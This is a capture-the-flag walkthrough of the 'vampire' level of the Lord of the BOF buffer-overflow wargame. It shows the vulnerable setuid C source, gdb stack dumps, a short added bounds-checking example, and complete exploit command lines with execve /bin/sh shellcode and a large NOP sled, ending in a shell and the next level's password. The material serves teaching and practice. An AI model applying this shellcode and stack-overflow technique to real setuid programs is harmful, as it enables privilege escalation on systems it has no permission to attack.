Log in as troll / aspirin
vampire.c
[troll@localhost troll]$ ls -l
total 16
-rwsr-sr-x 1 vampire vampire 12103 Mar 2 2010 vampire
-rw-r--r-- 1 root root 550 Mar 29 2010 vampire.c
[troll@localhost troll]$ cat vampire.c
/*
The Lord of the BOF : The Fellowship of the BOF
- vampire
- check 0xbfff
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
    char buffer[40];
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }
    // here is changed!
    if(argv[1][46] == '\xff')
    {
        printf("but it's not forever\n");
        exit(0);
    }
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
}
A new condition was added: argv[1][46] must not be \xff. At the same time the code that cleared the environment variables and the buffer is gone, so argv[2] can be used.
The stack grows downward, so the larger it gets, the lower the addresses it occupies. To make the stack frame big enough that the region at or below 0xbffeffff is used, I will pass roughly 100,000 NOPs.
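As an added illustration (not the wargame's own code), the following C expresses vampire's two byte tests over a 32-bit little-endian return address and places a bounds-checked copy beside the unchecked strcpy: the byte filter still accepts every address in 0xbffe0000..0xbffeffff, which is exactly where a large frame lands, while the length check rejects an overlong argument no matter what it contains. The function names and the 256-byte test limit are my own.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BUF_LEN 40   /* same size as vampire's char buffer[40] */

/* vampire's two tests, expressed over the little-endian return address:
 * argv[1][47] is the most significant byte, argv[1][46] the one below it.
 * Returns 1 when the filter would let the address through. */
int vampire_filter_accepts(uint32_t ret_addr)
{
    unsigned char hi  = (unsigned char)(ret_addr >> 24);  /* must be 0xbf */
    unsigned char mid = (unsigned char)(ret_addr >> 16);  /* must not be 0xff */
    return hi == 0xbf && mid != 0xff;
}

/* Hardened replacement for strcpy(buffer, argv[1]): refuse any source that
 * does not fit in dst together with its terminator, so the saved frame
 * pointer and return address can never be reached. 0 = copied, -1 = rejected. */
int copy_arg_checked(char *dst, size_t dst_len, const char *src)
{
    size_t n = 0;
    while (n < dst_len && src[n] != '\0')
        n++;
    if (n == dst_len)          /* no terminator within dst_len bytes */
        return -1;
    memcpy(dst, src, n + 1);   /* n + 1 <= dst_len, includes the NUL */
    return 0;
}

/* Constructed input: an argument of `len` 'A's copied into a BUF_LEN buffer
 * through copy_arg_checked; returns its result. Lengths up to 255 supported. */
int accepts_length(size_t len)
{
    char src[256];
    char buffer[BUF_LEN];
    if (len >= sizeof src)
        return -1;
    memset(src, 'A', len);
    src[len] = '\0';
    return copy_arg_checked(buffer, sizeof buffer, src);
}
```

The 110,000-byte argument used later in this writeup is rejected by copy_arg_checked before a single byte past buffer is touched, whereas the byte filter alone only rules out the 0xbfff0000..0xbfffffff page.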
[troll@localhost troll]$ ./vampire2 `python -c 'print "A"*47+"\xbf"+"\x90"*100000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...(non-printable \xbf and NOP bytes omitted)
Segmentation fault (core dumped)
Let's analyze the core file.
[troll@localhost troll]$ gdb -c core -q
Core was generated by `...(non-printable NOP bytes omitted)'.
Program terminated with signal 11, Segmentation fault.
#0 0xbf414141 in ?? ()
(gdb) x/10000x $esp
...
0xbffffc30: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc40: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc50: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc60: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc70: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc80: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc90: 0x90909090 0x6850c031 0x68732f2f 0x69622f68
0xbffffca0: 0x50e3896e 0x89e18953 0xcd0bb0c2 0x454c0080
0xbffffcb0: 0x504f5353 0x7c3d4e45 0x7273752f 0x6e69622f
0xbffffcc0: 0x73656c2f 0x70697073 0x68732e65 0x00732520
0xbffffcd0: 0x52455355 0x454d414e 0x4948003d 0x49535453
0xbffffce0: 0x313d455a 0x00303030 0x54534f48 0x454d414e
0xbffffcf0: 0x636f6c3d 0x6f686c61 0x6c2e7473 0x6c61636f
...
After scrolling down a long way, the addresses of the region holding the shellcode appeared.
By mistake I had put the NOPs and shellcode into argv[1] when they should have gone into argv[2], so I ran it again.
[troll@localhost troll]$ ./vampire2 `python -c 'print "A"*47+"\xbf "+"\x90"*110000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?
Segmentation fault (core dumped)
[troll@localhost troll]$ gdb -c core -q
Core was generated by `./vampire2 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...(non-printable bytes omitted)'.
Program terminated with signal 11, Segmentation fault.
#0 0xbf414141 in ?? ()
(gdb) x/1000x $esp
0xbffe4d70: 0x00000000 0xbffe4db4 0xbffe4dc4 0x40013868
0xbffe4d80: 0x00000003 0x08048380 0x00000000 0x080483a1
0xbffe4d90: 0x08048430 0x00000003 0xbffe4db4 0x080482e0
0xbffe4da0: 0x080484fc 0x4000ae60 0xbffe4dac 0x40013e90
0xbffe4db0: 0x00000003 0xbffe4ea8 0xbffe4eb3 0xbffe4ee4
0xbffe4dc0: 0x00000000 0xbffffcae 0xbffffcd0 0xbffffcda
0xbffe4dd0: 0xbffffce8 0xbffffd07 0xbffffd15 0xbffffd2e
0xbffe4de0: 0xbffffd49 0xbffffd54 0xbffffd62 0xbffffda3
0xbffe4df0: 0xbffffdb4 0xbffffdc9 0xbffffdd9 0xbffffde4
0xbffe4e00: 0xbffffe01 0xbffffe0c 0xbffffe19 0xbffffe21
0xbffe4e10: 0xbfffffe4 0x00000000 0x00000003 0x08048034
0xbffe4e20: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffe4e30: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffe4e40: 0x00000008 0x00000000 0x00000009 0x08048380
0xbffe4e50: 0x0000000b 0x000001fc 0x0000000c 0x000001fc
0xbffe4e60: 0x0000000d 0x000001fc 0x0000000e 0x000001fc
0xbffe4e70: 0x00000010 0x0f8bfbff 0x0000000f 0xbffe4ea3
0xbffe4e80: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffe4e90: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffe4ea0: 0x69000000 0x00363836 0x61762f2e 0x7269706d
0xbffe4eb0: 0x41003265 0x41414141 0x41414141 0x41414141
0xbffe4ec0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe4ed0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe4ee0: 0x00bf4141 0x90909090 0x90909090 0x90909090
0xbffe4ef0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4f00: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4f10: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4f20: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4f30: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4f40: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4f50: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4f60: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4f70: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4f80: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4f90: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4fa0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4fb0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4fc0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4fd0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe4fe0: 0x90909090 0x90909090 0x90909090 0x90909090
...
Any address inside the NOP region will do.
I picked one around 0xbffee990, and the attack succeeded.
[troll@localhost troll]$ ./vampire `python -c 'print "A"*44+"\x90\xe9\xfe\xbf "+"\x90"*110000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...(non-printable address bytes omitted)
bash$ my-pass
euid = 509
music world